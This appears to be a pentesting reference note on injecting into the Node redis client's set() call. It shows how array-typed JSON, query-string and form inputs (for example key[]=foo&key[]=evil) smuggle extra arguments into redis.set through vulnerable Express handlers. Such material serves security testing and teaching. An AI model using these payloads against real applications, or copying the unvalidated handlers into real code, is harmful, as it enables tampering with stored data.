Link to this headingRedis

NPM Redis can be used either way to set values

client.set("some_key", "some_val"); client.set(["some_key", "some_val"]);

Link to this headingJSON Injection

If the source looks like this below we have control over the JSON key variable.

app.use(bodyParser.json()); app.post('/', function (req, res) { redis.set(req.body.key, "default"); });

Using a Normal request with the JSON body to {key : "foo"} creates the correct data.

redis.set("foo", "default");

But using a Inject Request with the JSON body to {key : ["foo", "evil"]} creates an injection

redis.set(["foo", "evil"], "default");

Link to this headingQuery String Injection

If the source looks like this below we have control over the Query String key variable.

app.get('/', function (req, res) { redis.set(req.query.key, "default"); });

Using a Normal request with the Query String to ?key=foo creates the correct data.

redis.set("foo", "default");

But using a Inject Request with the Query String to ?key[]=foo&key[]=evil creates an injection

redis.set(["foo", "evil"], "default");

Link to this headingForm URL Encoded Body Parameter

If the source looks like this below we have control over the Query String key variable.

app.use(bodyParser.urlencoded()); app.post('/', function (req, res) { redis.set(req.body.key, "default"); });

Using a Normal request with the Form Body to key=foo creates the correct data.

redis.set("foo", "default");

But using a Inject Request with the Form Body to key[]=foo&key[]=evil creates an injection

redis.set(["foo", "evil"], "default");